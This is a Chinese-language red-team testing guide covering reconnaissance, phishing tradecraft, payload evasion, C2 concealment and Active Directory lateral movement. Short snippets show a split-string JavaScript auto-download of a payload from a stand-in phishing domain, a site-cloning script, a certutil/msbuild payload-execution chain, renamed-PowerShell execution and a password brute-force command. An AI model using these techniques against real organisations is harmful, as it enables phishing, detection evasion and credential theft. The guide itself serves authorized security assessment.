红队渗透测试全面指南<\/h1>

1. 红队测试的意义与目标<\/h2>

红队测试是一种模拟真实攻击的安全评估方法，主要目标包括：<\/p>

评估客户对威胁行为的反应能力<\/strong>：测试安全团队检测和响应攻击的能力<\/li>
评估客户网络安全态势<\/strong>：通过模拟访问敏感数据(如CEO邮箱、客户数据)来验证防护措施<\/li>

演示潜在攻击路径<\/strong>：展示攻击者可能利用的漏洞和入侵路径<\/li> <\/ul>
2. 目标识别与信息收集<\/h2>
2.1 初始信息收集<\/h3>

社交媒体分析<\/strong>：通过Facebook等平台获取员工姓名信息<\/li>
公开密码库搜索<\/strong>：检查Github、Pastebin等平台是否有泄露的凭证<\/li>
OWA\/Office 365侦察<\/strong>：这些服务通常是高价值目标<\/li> <\/ul>
2.2 OWA侦察技术<\/h3>

GAL泄露检查<\/strong>：https:\/\/your.target\/owa\/service.svc?action=GetPeopleFilters<\/code><\/li>
无MFA时的暴力破解<\/strong>：https:\/\/your.target\/EWS\/Exchange.asmx<\/code><\/li>
Office 365 API端点<\/strong>：读写邮件：https:\/\/outlook.office365.com\/api\/v1.0\/<\/code><\/li> 暴力破解：https:\/\/autodiscover-s.outlook.com\/autodiscover\/autodiscover.xml<\/code><\/li> <\/ul> <\/li> <\/ul> 2.3 Shodan利用<\/h3> 通过Shodan搜索目标公共IP范围内的关键服务：<\/p> Citrix门户<\/li> OWA服务<\/li> VPN端点<\/li> 任何可远程认证的服务<\/li> <\/ul> 2.4 邮件服务器指纹识别<\/h3> 发送邮件到不存在的账户，分析返回的错误信息以识别：<\/p> 使用的安全软件<\/li> 配置的安全策略<\/li> <\/ul> 2.5 社交工程信息收集<\/h3> 通过LinkedIn等平台收集员工信息<\/li> 分析企业网站寻找钓鱼主题灵感<\/li> <\/ul> 3. 钓鱼攻击最佳实践<\/h2> 3.1 钓鱼攻击黄金法则<\/h3> 不要将恶意负载直接放入邮件<\/strong><\/li> 避免自动化安全解决方案检测<\/strong><\/li> 使用分类域名<\/strong><\/li> 强制使用HTTPS<\/strong><\/li> 选择无聊的钓鱼主题<\/strong><\/li> 避免使用拼写错误的域名<\/strong><\/li> 不要重复使用相同域名<\/strong><\/li> <\/ol> 3.2 高级钓鱼技术<\/h3> 动态URL生成<\/strong>：使用Apache mod_rewrite创建唯一ID的URL<\/p> RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ index.php [L,QSA] <\/code><\/pre> <\/li> JavaScript混淆技术<\/strong>：<\/p> <a<\/span> id<\/span>=<\/span>"download"<\/span> href<\/span>=<\/span>"#"<\/span>>下载行为准则<\/a<\/span>> <\/span><\/span><script<\/span>> <\/span><\/span> document.getElementById<\/span>("download"<\/span>).onclick<\/span> =<\/span> function<\/span>() { <\/span><\/span> document.location<\/span> =<\/span> "https:\/\/phish"<\/span> +<\/span> "y.domain\/pay"<\/span> +<\/span> "load.docm"<\/span>; <\/span><\/span> }; <\/span><\/span> document.getElementById<\/span>("download"<\/span>).click<\/span>(); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/code><\/pre><\/li> 域名克隆工具<\/strong>：<\/p> #!\/bin\/bash <\/span><\/span><\/span><\/span>echo "Cloning <\/span>$1"<\/span> <\/span><\/span>wget $1 -O index.html &> \/dev\/null <\/span><\/span>TAG=<\/span>"<base href=\"<\/span>$1\"\/><\/head>"<\/span> <\/span><\/span>sed '\/<\\/head>\/i\'<\/span>"<\/span>$TAG"<\/span> index.html | tee index.html &> \/dev\/null <\/span><\/span>echo "index.html was saved and modified"<\/span> <\/span><\/span><\/code><\/pre><\/li> 分类域名搜索工具<\/strong>：CatMyFish<\/a><\/p> <\/li> <\/ul> 4. 有效负载创建与规避<\/h2> 4.1 规避检测的核心原则<\/h3> 避免直接运行PowerShell<\/strong>：<\/p> 使用PowerLessShell<\/a>通过MsBuild.exe执行<\/li> 示例： certutil -decodehex vpmMLfdAbV dWCBVaaSqezNvPbCKpFyJiwG && copy msbuild.exe QrjZkfusnfnbvOoGuqq.exe && QrjZkfusnfnbvOoGuqq.exe dWCBVaaSqezNvPbCKpFyJiwG && del QrjZkfusnfnbvOoGuqq.exe && del dWCBVaaSqezNvPbCKpFyJiwG && del vpmMLfdAbV <\/code><\/pre> <\/li> <\/ul> <\/li> 宏攻击规避<\/strong>：<\/p> 避免使用WScript.Shell和Shell()<\/li> 使用WMI执行负载(MaliciousMacroGenerator<\/a>)<\/li> <\/ul> <\/li> 二进制文件修改<\/strong>：<\/p> 修改签名二进制文件的HASH(Windows-SignedBinary<\/a>)<\/li> 重命名二进制文件执行： copy powershell.exe tLclgEomOrR.exe tLclgEomOrR.exe -exec bypass Get-Help <\/code><\/pre> <\/li> <\/ul> <\/li> 环境检测<\/strong>：<\/p> 添加沙箱检测代码(如检查iexplore进程)<\/li> ClickOnceGenerator<\/a><\/li> <\/ul> <\/li> 负载混淆工具<\/strong>：<\/p> SCT-obfuscator<\/a><\/li> UniByAv<\/a><\/li> DKMC<\/a><\/li> Base64-Obfuscator<\/a><\/li> <\/ul> <\/li> <\/ol> 4.2 沙箱检测技术<\/h3> 检测端点与沙箱的区别：<\/p> 内存大小(端点≥4GB)<\/li> 磁盘大小(端点≥250GB)<\/li> CPU数量(端点≥2)<\/li> 运行进程(如OUTLOOK.exe)<\/li> 网络访问状态<\/li> 域加入状态<\/li> 时区设置<\/li> 系统运行时间<\/li> 系统活动(剪贴板内容等)<\/li> <\/ul> 5. 命令与控制(C2)隐蔽技术<\/h2> 域前置技术<\/strong>(Domain Fronting)<\/li> 使用分类域名<\/strong><\/li> 强制HTTPS连接<\/strong><\/li> 协议选择<\/strong>：HTTP混入合法流量<\/li> 高级C2工具<\/strong>：ThunderShell<\/a><\/li> <\/ul> 6. 内网横向移动与权限提升<\/h2> 6.1 初始信息收集<\/h3> 避免直接运行PowerShell<\/strong><\/li> 避免使用net*命令<\/strong><\/li> 避免连接所有系统<\/strong><\/li> <\/ul> 6.2 实用脚本<\/h3> 用户邮箱收集<\/strong>：<\/p> Dump-UserEmail<\/a><\/li> <\/ul> <\/li> 域密码暴力破解<\/strong>：<\/p> Invoke-ADPasswordBruteForce<\/a><\/li> 示例： "neo","morpheus" | Invoke-ADPasswordBruteForce -Password "password" -Domain MATRIX <\/code><\/pre> <\/li> <\/ul> <\/li> 用户SamAccountName查找<\/strong>：<\/p> Search-FullNameToSamAccount<\/a><\/li> <\/ul> <\/li> 用户登录事件搜索<\/strong>：<\/p> Search-EventForUser<\/a><\/li> <\/ul> <\/li> 浏览器书签收集<\/strong>：<\/p> Get-IEBookmarks<\/a><\/li> <\/ul> <\/li> <\/ol> 6.3 高级技巧<\/h3> WMI远程执行<\/strong>：<\/p> Remote-WmiExecute<\/a><\/li> <\/ul> <\/li> Kerberos票据利用<\/strong>：<\/p> 注意票据续约问题<\/li> 进程注入选择(explorer.exe vs svchost.exe\/conhost.exe)<\/li> <\/ul> <\/li> Active Directory信息挖掘<\/strong>：<\/p> 用户注释和描述字段可能包含敏感信息<\/li> Dump-Username<\/a><\/li> <\/ul> <\/li> <\/ul> 6.4 PowerView实用命令<\/h3> Find-LocalAdminAccess<\/strong>：查找具有本地管理员权限的主机<\/li> Get-NetDomainTrust<\/strong>：列出所有信任域<\/li> Get-NetForestTrust<\/strong>：列出所有森林<\/li> Invoke-ShareFinder<\/strong>：列出所有共享<\/li> Get-NetLocalGroup<\/strong>：列出本地管理组\/用户组<\/li> <\/ul> 7. 总结与最佳实践<\/h2> 钓鱼攻击<\/strong>：<\/p> 每次活动使用不同的策略<\/li> 负载制作是一门需要精心策划的艺术<\/li> <\/ul> <\/li> 规避检测<\/strong>：<\/p> 尽量避免直接运行PowerShell<\/li> 使用非标准技术执行命令<\/li> <\/ul> <\/li> 隐蔽性<\/strong>：<\/p> 根据情况调整工具和技术<\/li> 平衡隐蔽性与任务需求<\/li> <\/ul> <\/li> <\/ol> 8. 参考资源<\/h2> A-Journey-Into-a-RedTeam-2018.pdf<\/a><\/li> 文中提到的所有GitHub项目<\/li> <\/ul>